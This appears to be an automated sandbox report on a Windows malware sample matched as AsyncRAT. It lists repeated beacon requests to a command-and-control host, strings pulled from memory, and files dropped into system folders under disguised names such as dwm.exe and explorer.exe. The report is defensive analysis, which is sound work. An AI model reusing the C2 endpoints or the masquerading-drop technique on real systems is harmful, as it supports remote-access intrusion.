Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?YdE=LzctCvlE2&IflMqVEea0RQ7qWO8zQYTmmGlF=jTqo1R&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&YdE=LzctCvlE2&IflMqVEea0RQ7qWO8zQYTmmGlF=jTqo1R HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?2bGs=iEebvFdRV2KfjpT6qy&YnOt1NzY3yp8L=1nvXnnSLS7uFD0eVJL&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&2bGs=iEebvFdRV2KfjpT6qy&YnOt1NzY3yp8L=1nvXnnSLS7uFD0eVJL HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?Z3DPO5MO2Kls4kB=n03j5lcn0S1dKbm&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&Z3DPO5MO2Kls4kB=n03j5lcn0S1dKbm HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?YdE=LzctCvlE2&IflMqVEea0RQ7qWO8zQYTmmGlF=jTqo1R&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&YdE=LzctCvlE2&IflMqVEea0RQ7qWO8zQYTmmGlF=jTqo1R HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36Host: a0583448.xsph.ru
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?2bGs=iEebvFdRV2KfjpT6qy&YnOt1NzY3yp8L=1nvXnnSLS7uFD0eVJL&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&2bGs=iEebvFdRV2KfjpT6qy&YnOt1NzY3yp8L=1nvXnnSLS7uFD0eVJL HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36Host: a0583448.xsph.ru
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?Z3DPO5MO2Kls4kB=n03j5lcn0S1dKbm&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&Z3DPO5MO2Kls4kB=n03j5lcn0S1dKbm HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: a0583448.xsph.ru
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?JguO4La5pQKN8nwc=6Wnlvd00Bm49&gyyX5OxKdcmS76gDltEGlaNJ1YC3=2if5vuWYlripL&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&JguO4La5pQKN8nwc=6Wnlvd00Bm49&gyyX5OxKdcmS76gDltEGlaNJ1YC3=2if5vuWYlripL HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?JguO4La5pQKN8nwc=6Wnlvd00Bm49&gyyX5OxKdcmS76gDltEGlaNJ1YC3=2if5vuWYlripL&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&JguO4La5pQKN8nwc=6Wnlvd00Bm49&gyyX5OxKdcmS76gDltEGlaNJ1YC3=2if5vuWYlripL HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1Host: a0583448.xsph.ru
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?egSzliE1vjRZ7aATd0=eQrb1MtQjsBwzkVYe&vvuJKZwWapy84nBVfSxEam1ReIt=cymBgcrFuUFRpewDbkyXudFCl&ZJ3cpCq94lDwcb=6kKMgY50yz3TVC8tjaFDiMSoDlqkK&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&egSzliE1vjRZ7aATd0=eQrb1MtQjsBwzkVYe&vvuJKZwWapy84nBVfSxEam1ReIt=cymBgcrFuUFRpewDbkyXudFCl&ZJ3cpCq94lDwcb=6kKMgY50yz3TVC8tjaFDiMSoDlqkK HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?egSzliE1vjRZ7aATd0=eQrb1MtQjsBwzkVYe&vvuJKZwWapy84nBVfSxEam1ReIt=cymBgcrFuUFRpewDbkyXudFCl&ZJ3cpCq94lDwcb=6kKMgY50yz3TVC8tjaFDiMSoDlqkK&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&egSzliE1vjRZ7aATd0=eQrb1MtQjsBwzkVYe&vvuJKZwWapy84nBVfSxEam1ReIt=cymBgcrFuUFRpewDbkyXudFCl&ZJ3cpCq94lDwcb=6kKMgY50yz3TVC8tjaFDiMSoDlqkK HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)Host: a0583448.xsph.ru
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?qCFOYAIwvpUHNGAS5F6bha=oglzIDaRId7nS4uU7fBHp&gohOiji0=IPYbrxK9sUXLoPdr&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&qCFOYAIwvpUHNGAS5F6bha=oglzIDaRId7nS4uU7fBHp&gohOiji0=IPYbrxK9sUXLoPdr HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?qCFOYAIwvpUHNGAS5F6bha=oglzIDaRId7nS4uU7fBHp&gohOiji0=IPYbrxK9sUXLoPdr&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&qCFOYAIwvpUHNGAS5F6bha=oglzIDaRId7nS4uU7fBHp&gohOiji0=IPYbrxK9sUXLoPdr HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36Host: a0583448.xsph.ru
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36Host: a0583448.xsph.ru

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?YdE=LzctCvlE2&IflMqVEea0RQ7qWO8zQYTmmGlF=jTqo1R&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&YdE=LzctCvlE2&IflMqVEea0RQ7qWO8zQYTmmGlF=jTqo1R HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?2bGs=iEebvFdRV2KfjpT6qy&YnOt1NzY3yp8L=1nvXnnSLS7uFD0eVJL&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&2bGs=iEebvFdRV2KfjpT6qy&YnOt1NzY3yp8L=1nvXnnSLS7uFD0eVJL HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?Z3DPO5MO2Kls4kB=n03j5lcn0S1dKbm&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&Z3DPO5MO2Kls4kB=n03j5lcn0S1dKbm HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?YdE=LzctCvlE2&IflMqVEea0RQ7qWO8zQYTmmGlF=jTqo1R&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&YdE=LzctCvlE2&IflMqVEea0RQ7qWO8zQYTmmGlF=jTqo1R HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36Host: a0583448.xsph.ru
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?2bGs=iEebvFdRV2KfjpT6qy&YnOt1NzY3yp8L=1nvXnnSLS7uFD0eVJL&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&2bGs=iEebvFdRV2KfjpT6qy&YnOt1NzY3yp8L=1nvXnnSLS7uFD0eVJL HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36Host: a0583448.xsph.ru
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?Z3DPO5MO2Kls4kB=n03j5lcn0S1dKbm&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&Z3DPO5MO2Kls4kB=n03j5lcn0S1dKbm HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: a0583448.xsph.ru
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?JguO4La5pQKN8nwc=6Wnlvd00Bm49&gyyX5OxKdcmS76gDltEGlaNJ1YC3=2if5vuWYlripL&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&JguO4La5pQKN8nwc=6Wnlvd00Bm49&gyyX5OxKdcmS76gDltEGlaNJ1YC3=2if5vuWYlripL HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?JguO4La5pQKN8nwc=6Wnlvd00Bm49&gyyX5OxKdcmS76gDltEGlaNJ1YC3=2if5vuWYlripL&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&JguO4La5pQKN8nwc=6Wnlvd00Bm49&gyyX5OxKdcmS76gDltEGlaNJ1YC3=2if5vuWYlripL HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1Host: a0583448.xsph.ru
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?egSzliE1vjRZ7aATd0=eQrb1MtQjsBwzkVYe&vvuJKZwWapy84nBVfSxEam1ReIt=cymBgcrFuUFRpewDbkyXudFCl&ZJ3cpCq94lDwcb=6kKMgY50yz3TVC8tjaFDiMSoDlqkK&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&egSzliE1vjRZ7aATd0=eQrb1MtQjsBwzkVYe&vvuJKZwWapy84nBVfSxEam1ReIt=cymBgcrFuUFRpewDbkyXudFCl&ZJ3cpCq94lDwcb=6kKMgY50yz3TVC8tjaFDiMSoDlqkK HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?egSzliE1vjRZ7aATd0=eQrb1MtQjsBwzkVYe&vvuJKZwWapy84nBVfSxEam1ReIt=cymBgcrFuUFRpewDbkyXudFCl&ZJ3cpCq94lDwcb=6kKMgY50yz3TVC8tjaFDiMSoDlqkK&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&egSzliE1vjRZ7aATd0=eQrb1MtQjsBwzkVYe&vvuJKZwWapy84nBVfSxEam1ReIt=cymBgcrFuUFRpewDbkyXudFCl&ZJ3cpCq94lDwcb=6kKMgY50yz3TVC8tjaFDiMSoDlqkK HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)Host: a0583448.xsph.ru
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?qCFOYAIwvpUHNGAS5F6bha=oglzIDaRId7nS4uU7fBHp&gohOiji0=IPYbrxK9sUXLoPdr&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&qCFOYAIwvpUHNGAS5F6bha=oglzIDaRId7nS4uU7fBHp&gohOiji0=IPYbrxK9sUXLoPdr HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?qCFOYAIwvpUHNGAS5F6bha=oglzIDaRId7nS4uU7fBHp&gohOiji0=IPYbrxK9sUXLoPdr&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&qCFOYAIwvpUHNGAS5F6bha=oglzIDaRId7nS4uU7fBHp&gohOiji0=IPYbrxK9sUXLoPdr HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36Host: a0583448.xsph.ru
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36Host: a0583448.xsph.ru

Source: global traffic

DNS traffic detected: DNS query: a0583448.xsph.ru

Source: explorer.exe, 0000001A.00000002.1815551344.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1815551344.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1815551344.0000000002A76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a0583448.xsph.ru
Source: explorer.exe, 0000001A.00000002.1815551344.0000000002A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a0583448.xsph.ru/
Source: dwm.exe, 00000016.00000002.1577433938.000000000304B000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 00000016.00000002.1577433938.000000000307A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a0583448.xsph.ru/HttpCpu.php?JguO4La5pQKN8nwc=6Wnlvd00Bm49&gyyX5OxKdcmS76gDltEGlaNJ1YC3=2if5v
Source: explorer.exe, 0000001A.00000002.1815551344.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1815551344.0000000002A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a0583448.xsph.ru/HttpCpu.php?YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN&c43ad04a366e3e13d187a2f4
Source: dwm.exe, 0000000F.00000002.1476099366.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 0000000F.00000002.1476099366.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a0583448.xsph.ru/HttpCpu.php?YdE=LzctCvlE2&IflMqVEea0RQ7qWO8zQYTmmGlF=jTqo1R&c43ad04a366e3e13
Source: explorer.exe, 00000010.00000002.1484541744.000000000374B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.1484541744.0000000003777000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a0583448.xsph.ru/HttpCpu.php?Z3DPO5MO2Kls4kB=n03j5lcn0S1dKbm&c43ad04a366e3e13d187a2f4f0fffdd3
Source: jOMfQSwRhTi.exe, 00000018.00000002.1647819226.00000000025CE000.00000004.00000800.00020000.00000000.sdmp, jOMfQSwRhTi.exe, 00000018.00000002.1647819226.00000000025F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a0583448.xsph.ru/HttpCpu.php?egSzliE1vjRZ7aATd0=eQrb1MtQjsBwzkVYe&vvuJKZwWapy84nBVfSxEam1ReIt
Source: perfCrtmonitorsvcMonitorDll.exe, 00000005.00000002.1437215349.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 0000000F.00000002.1476099366.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.1484541744.000000000374B000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 00000016.00000002.1577433938.000000000304B000.00000004.00000800.00020000.00000000.sdmp, jOMfQSwRhTi.exe, 00000018.00000002.1647819226.00000000025CE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1815551344.0000000002A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: perfCrtmonitorsvcMonitorDll.exe, 00000005.00000002.1438279004.00000000132C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000005.00000002.1438279004.00000000132C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: perfCrtmonitorsvcMonitorDll.exe PID: 7728, type: MEMORYSTR	Matched rule: Detects AsyncRAT Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe

Code function: 0_2_006E718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_006E718C

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\System32\WWanAPI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\System32\WWanAPI\dwm.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\System32\WWanAPI\6cb0b6c459d5d3455a3da700e713f2e2529862ff	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\ShellNew\WinStore.App.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\ShellNew\fd168b19609dff09898eecd88986acb731eb6ff4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\hh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\hh\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\hh\7a0fd90576e08807bde2cc57bcf9854bbce05fe3	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006E857B	0_2_006E857B
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006E407E	0_2_006E407E
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_0070D00E	0_2_0070D00E
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006F70BF	0_2_006F70BF
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_00711194	0_2_00711194
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_007002F6	0_2_007002F6
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006EE2A0	0_2_006EE2A0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006E3281	0_2_006E3281
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006F6646	0_2_006F6646
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_0070473A	0_2_0070473A
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_0070070E	0_2_0070070E
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006E27E8	0_2_006E27E8
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006F37C1	0_2_006F37C1
